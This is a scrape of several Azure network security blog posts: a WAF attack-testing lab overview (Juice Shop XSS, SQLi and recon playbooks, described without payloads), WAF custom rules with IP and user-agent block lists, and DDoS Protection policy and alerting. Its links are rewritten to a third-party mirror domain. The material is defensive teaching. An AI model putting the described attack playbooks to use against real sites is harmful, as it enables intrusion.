Azure Portal under <STRONG>Resource Group --&gt; SOC-NS-AG-WAFv2 --&gt; Frontend Public IP address</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Next Steps</H2> <P>&nbsp;</P> <P>Before proceeding to the next tutorial, take a few mins to review the following</P> <P>&nbsp;</P> <OL> <LI>OWASP Juice Shop publishing rule on Application Gateway</LI> <LI>Web Application Firewall configuration on Application Gateway</LI> <LI>Test connectivity to the OWASP Juice Shop website when accessing the application directly and when going to it through the Application Gateway</LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip:&nbsp; </STRONG>You can find the public URL of the deployed Juice Shop app in the Azure Portal under <STRONG>Resource Group --&gt;&nbsp; owaspdirect-&lt;guid&gt; --&gt; URL</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="50%" class="lia-align-left"> <H4>Previous: <A title="Tutorial Overview" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/tutorial-overview-azure-web-application-firewall-security/ba-p/2030423" target="_blank" rel="noopener">Tutorial Overview</A></H4> </TD> <TD width="50%" class="lia-align-left"> <H4>Next:&nbsp;<A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Reconnaissance Playbook</A></H4> </TD> </TR> </TBODY> </TABLE> <H4>&nbsp;</H4> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 15 Jan 2021 17:03:38 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-waf-security-protection-and-detection-lab/ba-p/2030469 Mohit_Kumar 2021-01-15T17:03:38Z Tutorial Overview: Azure Web Application Firewall Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/tutorial-overview-azure-web-application-firewall-security/ba-p/2030423 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>Customers often want to test and validate the capabilities of products before using them in mission critical environments.&nbsp; Same is true for <STRONG>Azure Web Application Firewall (WAF)</STRONG>, where customers often have a need to test its security capabilities and validate their effectiveness before deciding to secure their production workloads with it.</P> <P>&nbsp;</P> <P>To enable customers in rapidly validating the effectiveness of Azure WAF against real world web application attacks, we have&nbsp;designed this <STRONG>four</STRONG>-part lab tutorial.&nbsp; Part one of the tutorial provides guidance to quickly deploy a test environment with all required components.&nbsp; Parts two through four provide step by step walkthroughs for attacking a vulnerable web application with&nbsp;common, real-world, publicly available hacking and attack tools.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Tutorial Overview</H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>The purpose of the Azure WAF security protection and detection lab tutorial is to demonstrate <STRONG>Azure Web Application Firewall (WAF)</STRONG> capabilities in identifying, detecting, and protecting against suspicious activities and potential attacks against your Web Applications.&nbsp; In this <STRONG>four</STRONG>-part tutorial, you will learn how to</P> <P>&nbsp;</P> <OL> <LI>Configure the working environment to test Azure WAF protection against web application attacks</LI> <LI>Emulate an adversary by attacking and exploiting a vulnerable web application using step by step instructions</LI> <LI>Review <A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener"><STRONG>Azure Monitor Workbook for WAF</STRONG></A> to understand WAF detection and processing logic for specific attack patterns used in every tutorial</LI> </OL> <P>&nbsp;</P> <P>The lab tutorials provide walkthroughs for running successful attacks against the vulnerable <A href="#" target="_blank" rel="noopener"><STRONG>OWASP Juice Shop</STRONG></A> web application when it is exposed to the internet directly, without Azure WAF.&nbsp; The tutorials then also demonstrate effectiveness of <STRONG>Azure WAF on Application Gateway</STRONG> in blocking the same attacks against the same instance of the vulnerable OWASP Juice Shop Application when it is protected by Azure WAF<STRONG>.</STRONG></P> <P>&nbsp;</P> <P>This lab focuses on the OWASP protection ruleset and logging capabilities of Azure WAF.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Part 1 - Lab Setup</H3> <P>&nbsp;</P> <P>The first tutorial in this four-part series walks you through deploying/creating a lab environment for testing Azure WAF protection and logging capabilities.&nbsp; The tutorial includes information about machines and tools that are needed to set up the lab and complete its playbooks.&nbsp; The instructions assume you are comfortable with deploying and administering resources in Azure and have some familiarity with web application security concepts.&nbsp; The closer your lab is to the suggested lab setup, the easier it will be to follow Azure WAF testing procedures.&nbsp; When your lab setup is complete, use the Azure WAF Security Protection and Detection playbooks for testing.</P> <P>&nbsp;</P> <P><A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">Setup an Azure WAF Attack Testing Lab</A>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Part 2 - Reconnaissance Playbook</H3> <P>&nbsp;</P> <P>The second tutorial in this four-part series is a reconnaissance playbook.&nbsp; Reconnaissance activities allow attackers to gain a thorough understanding and complete mapping of your web application for later use.&nbsp; The playbook shows Azure WAF capabilities in identifying, detecting, and protecting against suspicious activities from potential recon attacks using examples from common, publicly available hacking and attack tools.</P> <P>&nbsp;</P> <P><A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_blank" rel="noopener">Reconnaissance Playbook</A></P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Part 3 - Vulnerability Exploitation Playbook</H3> <P>&nbsp;</P> <P>The vulnerability exploitation playbook is third in the four-part tutorial series.&nbsp; In the exploitation phase, an attacker attempts to exploit known or a previously identified vulnerability with intent to elevate privileges.&nbsp; As you run through this playbook, you will see <STRONG>Cross Site Scripting (XSS)</STRONG> detections and rules get triggered on Azure WAF from the attack you will simulate in your lab.</P> <P>&nbsp;</P> <P data-unlink="true">Cross Site Scripting (XSS)&nbsp;attacks are performed against web applications with the intent of compromising end users or the application itself.</P> <P>&nbsp;</P> <P><A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Part 4 - Data Disclosure and Exfiltration Playbook</H3> <P>&nbsp;</P> <P>The last tutorial in the four-part series is the data exfiltration playbook. During the data exfiltration phase, an attacker has already gained access to your application backend and attempts to disclose and copy sensitive data.&nbsp; You will simulate an <STRONG>SQL Injection (SQLi)</STRONG> attack to see the attack detection and protection capability of Azure WAF.</P> <P>&nbsp;</P> <P data-unlink="true">SQL Injection (SQLi)&nbsp;attacks are performed against web applications with the intent of exposing/exfiltrating sensitive application and user data.</P> <P>&nbsp;</P> <P><A title="Data Disclosure and Exfiltration Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-4-data-disclosure-and-exfiltration-playbook-azure-waf/ba-p/2031269" target="_blank" rel="noopener">Data Disclosure and Exfiltration Playbook</A></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H4>Next:&nbsp;<A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">Setup an Azure WAF Attack Testing Lab</A>&nbsp;</H4> <H4>&nbsp;</H4> <H4>&nbsp;</H4> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 15 Jan 2021 02:07:38 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/tutorial-overview-azure-web-application-firewall-security/ba-p/2030423 Mohit_Kumar 2021-01-15T02:07:38Z Azure WAF Custom Rule Samples and Use Cases https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-waf-custom-rule-samples-and-use-cases/ba-p/2033020 <P>Written in collaboration with&nbsp;<LI-USER uid="629915"></LI-USER>&nbsp;</P> <P>&nbsp;</P> <P>This post will detail how to use Custom Rules on Azure WAF, including some examples of common use cases fulfilled by this rule type. Custom Rules provide a versatile way to build controls that fulfill security requirements and protect applications from attacks that are unique to your applications.</P> <P>&nbsp;</P> <H2>WAF Rule Types and Processing</H2> <P>Azure WAF currently offers 3 rule types, which are processed in the following order:</P> <OL> <LI>Custom Rules – custom rules are processed first, and function according to the logic you select. This makes them very powerful as the first line of defense for web applications.</LI> <LI>Managed OWASP Rules – OWASP rulesets are based on the <A href="#" target="_blank" rel="noopener">SpiderLabs Core Ruleset (CRS)</A>, and can detect common web attacks like SQL injection, cross-site scripting, and command injection. These rules cannot be modified, but the ruleset can be tuned by using exclusions and by modifying rule actions (a topic for another post).</LI> <LI>Managed Bot Rules – these rules identify potential bot activity by matching sources against our internal Threat Intelligence feeds. If traffic is coming from a known source of bot activity, the traffic can be blocked.</LI> </OL> <P>This post focuses on Custom Rules, but it is important to understand how the managed rulesets work. For more information on these, look for future blog posts here or consult the <A href="#" target="_blank" rel="noopener">Azure WAF documentation</A>.</P> <P>&nbsp;</P> <H2>Important Custom Rule Concepts</H2> <P>Custom Rules can be viewed and built using the Azure Portal by navigating to Web Application Firewall Policies (WAF), selecting your policy, and clicking on the Custom Rules blade. Creating a custom rule is as simple as clicking Add Custom Rule and entering a few required fields. However, there are some important concepts to understand before you create your own rules.</P> <P>&nbsp;</P> <P>The most important thing to mention about Custom Rules is that they are terminating. This means that if the logic of the rule is matched, all other rules stop processing,&nbsp;including the lower priority (higher number) Custom Rules, and both OWASP and Bot managed rulesets. This is the case regardless of the action of the rule; even if traffic is allowed, no further rules are processed. This can have positive or negative implications.</P> <P>&nbsp;</P> <P>The Allow action should be used sparingly in Custom Rules, because since the rule terminates, it means that all other inspection provided by WAF will be skipped. Understanding this, you can use Allow rules when the intent is to skip the other checks, such as in tuning situations. If certain requests tend to trigger false positives, you can use a Custom Rule to allow the traffic at a more granular level than it would be possible by using exclusions or disabling rules.</P> <P>&nbsp;</P> <P>In most scenarios, it is best to use Custom Rules with the Deny action, as a terminating Deny rule is entirely expected and without unanticipated consequences. For instance, if you wanted to use a WAF Custom Rule to create an IP Address allow list, it is better to Deny traffic that is not from the IP addresses in the list rather than Allow traffic from those IPs.&nbsp;Using the Deny action avoids causing traffic allowed by this rule to bypass the OWASP and Bot rulesets.</P> <P>&nbsp;</P> <P>Another concept to make use of in constructing effective Custom Rules is compound conditions. Rules can be created with a single condition, or you can add multiple conditions that must be satisfied to constitute a match. When adding multiple conditions, they are added as an AND statement, so all conditions must be met for the Action to take place. If you need to construct a rule with OR logic, it is best to create multiple rules with the same Action.</P> <P>&nbsp;</P> <H2>Custom Rule Example Templates and Use Cases</H2> <P>We have created <A href="#" target="_blank" rel="noopener">2 ARM templates</A>, which will create both WAF Policy types, one for WAF on Application Gateway and one for WAF on Front Door. These policies are intended to give you a starting point for creating your own Custom Rules. To deploy, simply click the Deploy to Azure buttons from the repository, select a Resource Group, and create your policies.</P> <P>&nbsp;</P> <P>These example policies must be modified to fit your requirements before associating with any Front Door or Application Gateway resources, and the following sections will provide guidance on how to do so.</P> <P>&nbsp;</P> <H3>Block Lists</H3> <P>Some customers have the requirement to block certain sources of traffic based on IP address or country of origin. In these scenarios, block lists can be used, which you must create and keep up to date. The examples included in the templates are GeoBlockList and IPBlockList. The behavior of these basic rules can be modified to add conditions if necessary. For example, you may want to block a certain part of a site from a geographic region, as pictured:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_1-1609857161165.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244290i21C9059CE59E2030/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_1-1609857161165.png" alt="Anthony_Roman_1-1609857161165.png" /></span></P> <P>&nbsp;</P> <P>Notice that there is a second condition in the "And if" box, which defines a specific request URI. This additional condition creates an AND expression, meaning that both the first condition about geolocation and the second condition about the request URI must be matched in order for the Deny action to trigger.</P> <P>&nbsp;</P> <P>These block lists can be added manually via the Portal or managed programmatically using ARM, API, or CLI. One example of <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306" target="_blank" rel="noopener">adding to a block list automatically using Azure Sentinel Playbooks</A> can be found in a previous post.</P> <P>&nbsp;</P> <H3>Allow Lists</H3> <P>IP address or geographic restrictions can be accomplished effectively using allow lists. This method is preferable if you only do business in certain countries, or if you have an internal website you would like to be available only to trusted IP addresses, such as corporate IP blocks.</P> <P>&nbsp;</P> <P>The following example shows the IPAllowList rule found in the template:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_2-1609857161169.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244292i2A84F072EB53FE6B/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_2-1609857161169.png" alt="Anthony_Roman_2-1609857161169.png" /></span></P> <P>&nbsp;</P> <P>Notice that the allow list uses the "Does not contain" operator. This allows our logic to use the Deny action to block only the traffic that does not originate from the trusted range. This means that the trusted IP addresses or ranges will continue to be inspected by the other applicable WAF rules. Using this approach, we can avoid creating a rule using the "Does contain" operation along with the Allow action, which would result in a rule termination scenario that would exempt the trusted traffic from further WAF inspection.</P> <P>&nbsp;</P> <H3>Controlling Allowed HTTP Methods</H3> <P>HTTP method enforcement can be done in a dynamic way using WAF Custom Rules. Consider the scenario where you have an API that should be available publicly for customers to GET and POST, but you want to reserve PUT and DELETE actions for traffic originating from trusted locations as an extra layer of security beyond authentication. The following modification of the MethodAllowList rule can be used to accomplish this.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_3-1609857161178.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244291iE66A797EC04943E8/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_3-1609857161178.png" alt="Anthony_Roman_3-1609857161178.png" /></span></P> <P>&nbsp;</P> <H3>Blocking User Agents</H3> <P>Some of the OWASP managed rules will detect well known malicious user agents, but if you find the need to block a specific set, a Custom Rule is a way to accomplish this. Of course, user agent is not a difficult element for an attacker to change, but this type of rule can help deflect unsophisticated attackers. The logic of the UserAgentBlock rule is represented in the template pictured below.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_4-1609857161181.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244293i3D88C4164179CCA7/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_4-1609857161181.png" alt="Anthony_Roman_4-1609857161181.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Rate Limiting with WAF for Front Door</H3> <P>WAF on Azure Front Door has the added capability of Custom Rules with a Rate Limit type, as distinct from Match type rules. Rate Limit rules will keep track of the number of requests from a particular IP address and block requests made after a threshold is reached.</P> <P>&nbsp;</P> <P>These rules can be part of an effective layer 7 DDoS protection strategy. Azure DDoS Protection, both at the platform level (free) and using the Standard tier (paid) will protect against high volume attacks, but there are application attacks that do not necessarily rely on high volume. Some of these attacks can be mitigated by using source rate limiting in Custom Rules. The idea is that a legitimate user of a site will make a predictable number of requests to the site over a given time period, but an attacker trying to disrupt the site’s availability would likely make more requests. A threshold can be set to limit the volume of traffic to a particular path from a source, as pictured below.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_5-1609857161185.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244295iB9B0B137E4FDACDC/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_5-1609857161185.png" alt="Anthony_Roman_5-1609857161185.png" /></span></P> <P>&nbsp;</P> <P>In the above rate limiting rule, 100 requests from the same IP address would be allowed within any 1 minute time period, but after the threshold is met, additional requests from that IP would be dropped for 1 minute. After the rate limiting period expires, traffic is allowed and the counter to 100 starts again.</P> <P>&nbsp;</P> <H3>Using WAF on Application Gateway to only Allow Traffic from your Front Door</H3> <P>A common architectural design is to use Azure Front Door to provide global load balancing and content distribution in front of Application Gateways hosted in 2 or more regions. NSGs can be used on the Application Gateway subnet to only allow traffic from the Front Door service, but the remaining security concern here is that Front Door is a shared service. You probably want to allow traffic only from your Front Door service specifically to prevent an attacker from setting up a “rogue” Front Door instance without WAF in order to circumvent inspection.</P> <P>&nbsp;</P> <P>Fortunately, Front Door adds a header (X-Azure-FDID) to all traffic it processes, which identifies it as your instance of Front Door.&nbsp;Pictured below is a WAF Custom Rule, AllowFrontDoor in the template, that will only allow traffic that contains this specific header value. This guarantees that traffic sourcing from unapproved Front Door instances will not connect to your service.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_6-1609857161187.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244294i71E36D89C852F09E/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_6-1609857161187.png" alt="Anthony_Roman_6-1609857161187.png" /></span></P> <P>&nbsp;</P> <H2>Summary</H2> <P>The preceding example use cases are not very complex in nature, yet they provide considerable results to improve the security of your applications. We hope these samples help you understand how flexible Custom Rules can be, and that you can use this as a starting point to build more advanced rule logic in your environment. There are many possibilities to add complexity and effectiveness to these examples, including using Regex to look for patterns in the request body. If you come up with any particularly useful rules, please feel free to share in the comments here or add a sample to our <A href="#" target="_blank" rel="noopener">GitHub repository</A>.</P> <P>&nbsp;</P> Fri, 15 Jan 2021 14:15:26 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-waf-custom-rule-samples-and-use-cases/ba-p/2033020 Anthony_Roman 2021-01-15T14:15:26Z Deploying DDoS Protection Standard with Azure Policy https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/deploying-ddos-protection-standard-with-azure-policy/ba-p/1942133 <P>One of the most important questions customers ask when deploying Azure DDoS Protection Standard for the first time is how to manage the deployment at scale. A DDoS Protection Plan represents an investment in protecting the availability of resources, and this investment must be applied intentionally across an Azure environment.</P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Creating a DDoS Protection Plan</A> and associating a few virtual networks using the Azure portal takes a single administrator just minutes, making it one of the easiest to deploy resources in Azure. However, in larger environments this can be a more difficult task, especially when it comes to managing the deployment as network assets multiply.</P> <P>&nbsp;</P> <P>Azure DDoS Protection Standard is deployed by creating a DDoS Protection Plan and associating VNets to that plan. The VNets can be in any subscription in the same tenant as the plan. While the deployment is done at the VNet level, the protection and the billing are both based on the public IP address resources associated to the VNets. For instance, if an Application Gateway is deployed in a certain VNet, its public IP becomes a protected resource, even though the virtual network itself only directly contains private addresses.</P> <P>&nbsp;</P> <P>A consideration worth making is that the cost is not insignificant – a DDoS Protection plan starts at $3,000 USD per month for up to 100 protected IPs, adding $30 per public IP beyond 100. When the commitment has been made to investing in this protection, it is very important for you to be able to ensure that investment is applied across all required assets.</P> <P>&nbsp;</P> <H2>Azure Policy to Audit and Deploy</H2> <P>We just posted an <A href="#" target="_blank" rel="noopener">Azure Policy sample to the Azure network security GitHub repository</A> that will audit whether a DDoS Protection Plan is associated to VNets, then optionally create a remediation task that will create the association to protect the VNet.</P> <P>&nbsp;</P> <P>The logic of the policy can be seen in the screenshot below. All virtual networks in the assignment scope are evaluated against the criteria of whether DDoS Protection is enabled and has a plan attached:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_1-1606769233463.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236710iD0900F6DA8E5168F/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_1-1606769233463.png" alt="Anthony_Roman_1-1606769233463.png" /></span></P> <P>&nbsp;</P> <P>Further down in the definition, there is a template that creates the association of the DDoS Protection Plan to the VNets in scope. Let’s look at what it takes to use this sample in a real environment.</P> <P>&nbsp;</P> <H2>Creating a Definition</H2> <P>To create an Azure Policy Definition:</P> <P>&nbsp;</P> <OL> <LI>Navigate to Azure Policy --&gt; Definitions and select '+ Policy Definition.'</LI> <LI>For the Definition Location field, select a subscription. This policy will still be able to be assigned to other subscriptions via Management Groups.</LI> <LI>Define an appropriate Name, Description, and Category for the Policy.</LI> <LI>In the Policy Rule box, replace the example text with the contents of <A href="#" target="_blank" rel="noopener">VNet-EnableDDoS.json</A></LI> <LI>Save.</LI> </OL> <P>&nbsp;</P> <H2>Assigning the Definition</H2> <P>Once the Policy Definition has been created, it must be assigned to a scope. This gives you the ability to either deploy the policy to everything, using either Management Group or Subscription as the scope, or select which resources get DDoS Protection Standard protection based on Resource Group.</P> <P>To assign the definition:</P> <P>&nbsp;</P> <OL> <LI>From the Policy Definition, click Assign.</LI> <LI>On the Basics tab, choose a scope and exclude resources if necessary.</LI> <LI>On the Parameters tab, choose the Effect (DeployIfNotExists if you want to remediate) and paste in the Resource ID of the DDoS Protection Plan in the tenant:<BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_2-1606769233474.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236711i95362FCCFB0B6E73/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_2-1606769233474.png" alt="Anthony_Roman_2-1606769233474.png" /></span> <P>&nbsp;</P> </LI> <LI>On the Remediation tab, check the box to create a remediation task and choose a location for the managed identity to be created. Network Contributor is an appropriate role:<BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_3-1606769233502.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236712iCBBA91BDE35F67A0/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_3-1606769233502.png" alt="Anthony_Roman_3-1606769233502.png" /></span> <P>&nbsp;</P> </LI> <LI>Create.</LI> </OL> <P>&nbsp;</P> <H2>Modifying the Policy Definition</H2> <P>The process outlined above can be used to apply DDoS Protection to collections of resources as defined by the boundaries of management groups, subscriptions, and resource groups. However, these boundaries do not always represent an exhaustive list of where DDoS Protection should or should not be applied. Sure, some customers want to attach a DDoS Protection Plan to every VNet, but most will want to be more selective.</P> <P>&nbsp;</P> <P>Even if resource groups are granular enough to determine whether DDoS Protection should be applied, Policy Assignments are limited to a single RG per assignment, so the process of creating an assignment for every resource group is prohibitively tedious.</P> <P>&nbsp;</P> <P>One solution to the problem of policy scoping is to modify the definition rather than the assignment. Let’s use the example of an environment where DDoS Protection is required for all production resources. Production environments could exist in many different subscriptions and resource groups, and this could change as new environments are stood up.</P> <P>&nbsp;</P> <P>The solution here is to use tags as the identifier of production resources. In order to use this as a way to scope Azure Policy Assignments, you must modify the definition. To do this, a short snippet needs to be added to the policy rule, along with corresponding parameters (or copied from <A href="#" target="_blank" rel="noopener">VNet-EnableDDoS-Tags.json)</A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_4-1606769233505.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236713i01E0C1162CAE0978/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_4-1606769233505.png" alt="Anthony_Roman_4-1606769233505.png" /></span></P> <P>&nbsp;</P> <P>After modifying a definition to look for tag values, the corresponding assignment will look slightly different:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_0-1606769789031.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236717i960DD2BD11A81E48/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_0-1606769789031.png" alt="Anthony_Roman_0-1606769789031.png" /></span></P> <P>&nbsp;</P> <P>In this configuration, a single Policy Definition can be assigned to a wide scope, such as a Management Group, and every tagged resource within will be in scope.</P> <P>&nbsp;</P> <H2>Verifying Compliance</H2> <P>When a Policy Assignment is created using a remediation action, the effect of the policy should guarantee compliance with requirements. To gain visibility into the auditing and remediation done by the policy, you can go to Azure Policy à Compliance and select the assignment to monitor:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_6-1606769233518.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/236715i625202C80B4C924E/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_6-1606769233518.png" alt="Anthony_Roman_6-1606769233518.png" /></span></P> <P>&nbsp;</P> <P>A successful remediation task denotes that the VNet is now protected by Azure DDoS Protection Standard.</P> <P>&nbsp;</P> <H2>End-to-End Management with Azure Policy</H2> <P>Moving beyond plan association to VNets, there are some other requirements of DDoS Protection that Azure Policy can help with.</P> <P>&nbsp;</P> <P>On the Azure network security GitHub repo, you can find a <A href="#" target="_blank" rel="noopener">policy to restrict creation of more than one DDoS Protection Plan per tenant</A>, which helps to ensure that those with access cannot inadvertently drive up costs.</P> <P>&nbsp;</P> <P>Another sample is available to <A href="#" target="_blank" rel="noopener">keep diagnostic logs enabled across all Public IP Addresses</A>, which keeps valuable data flowing to the teams that care about such data.</P> <P>&nbsp;</P> <P>The point that should be taken from this post is that Azure Policy is a great mechanism to audit and enforce compliance with DDoS Protection requirements, and it has the power to control most other aspects of Azure security and compliance.</P> <P>&nbsp;</P> Tue, 09 Feb 2021 17:51:22 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/deploying-ddos-protection-standard-with-azure-policy/ba-p/1942133 Anthony_Roman 2021-02-09T17:51:22Z Enriching DDoS Protection Alerts with Logic Apps https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enriching-ddos-protection-alerts-with-logic-apps/ba-p/1928000 <P><A href="#" target="_blank" rel="noopener">An ARM template recently posted to the Azure network security GitHub</A> repository has been created to deploy all components necessary for a detailed DDoS Protection alert that gets sent to the resource owner in addition to the security team, and even performs a basic availability check against the resource under attack. This post will explain why and how it all works.</P> <P>&nbsp;</P> <P>When Azure DDoS Protection Standard is enabled, the expectation is that any potential attack will be mitigated, and no additional response will be needed. However, like any security control, security teams often require visibility into the process of DDoS mitigation. For this reason, it is highly recommended that you <A href="#" target="_blank" rel="noopener">enable diagnostic logging for Public IP Address resources</A> to ensure valuable data is generated.</P> <P>&nbsp;</P> <P>In the event of an ongoing attack, security teams have access to <A href="#" target="_blank" rel="noopener">DDoS Mitigation flow logs</A><SPAN>,</SPAN> which record all traffic observed during a mitigation event, including whether it was allowed or dropped, the drop reason if applicable, and the source IP address. All this data allows teams to investigate the sources, tactics, and techniques of an attack, even if the actual mitigation is handled by Azure. In the event that support is needed during an attack, DDoS Protection Standard allows access to <A href="#" target="_blank" rel="noopener">Rapid Response support</A>.</P> <P>&nbsp;</P> <P>Since many security teams are concerned with alert fatigue, false positives, and generally not wanting to have to waste time investigating low priority alerts, it is important for these alerts to be truly actionable. We have received requests from customers to allow the owners of the resources being attacked to help determine whether intervention is required by the security team.</P> <P>&nbsp;</P> <H2>Azure Monitor Alert</H2> <P>The first stage in the process is to detect the DDoS attack, which is done here by an Azure Monitor alert rule. This can also be done using Azure Security Center or Azure Sentinel, and our plan is to create samples of the same logic described in this post for both Sentinel and Security Center (look for more upcoming blog posts).</P> <P>&nbsp;</P> <P>The query defined in the alert rule uses the DDoSProtectionNotifications category in the AzureDiagnostics table, which is written to as part of the diagnostic settings of Public IP Addresses. This event is the first data written when a DDoS mitigation event starts, so it is the perfect event to use for an alert.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">AzureDiagnostics | where Category == "DDoSProtectionNotifications" | where type_s == "MitigationStarted" | project ResourceId, SubscriptionId, Message, publicIpAddress_s</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>By default, the rule runs every 5 minutes, but the template or alert can be edited if you have different requirements. Notice that the query projects 4 fields; those will be very important for the Logic App to use.</P> <P>&nbsp;</P> <P>An action group is also created by the template and attached to the alert rule. The action group consists of only a webhook action, which is pre-populated by the webhook address of the Logic App trigger. If other actions are needed, such as direct email or SMS, those can be added later.</P> <P>&nbsp;</P> <H2>Logic App Alert Enrichment</H2> <P>The Logic App deployed by the ARM template is triggered by a webhook request, which is expected to pass Azure Monitor alert data using the default schema. The fields projected by the alert query will be reused by the Logic App.</P> <P>&nbsp;</P> <P>The raw JSON sent to the webhook looks like the following, with the projected query results contained in a row object at the bottom:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_1-1606241256562.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/235788i9E282AEAF47C3BC0/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_1-1606241256562.png" alt="Anthony_Roman_1-1606241256562.png" /></span></P> <P>&nbsp;</P> <P>After receiving the webhook request, the first step of the Logic App is to query the Azure Resource Graph API using fields parsed from the from the alert JSON. The basis of the query being run is <A href="#" target="_blank" rel="noopener">one that can be found on our GitHub repo</A>. The query will return more information about the resource behind the Public IP Address, which is information not readily available in the standard diagnostic logs or even Security Center. For example, a public IP address can be associated to Application Gateways, Load Balancers, VMs, or Network Virtual Appliances (NVAs).</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" 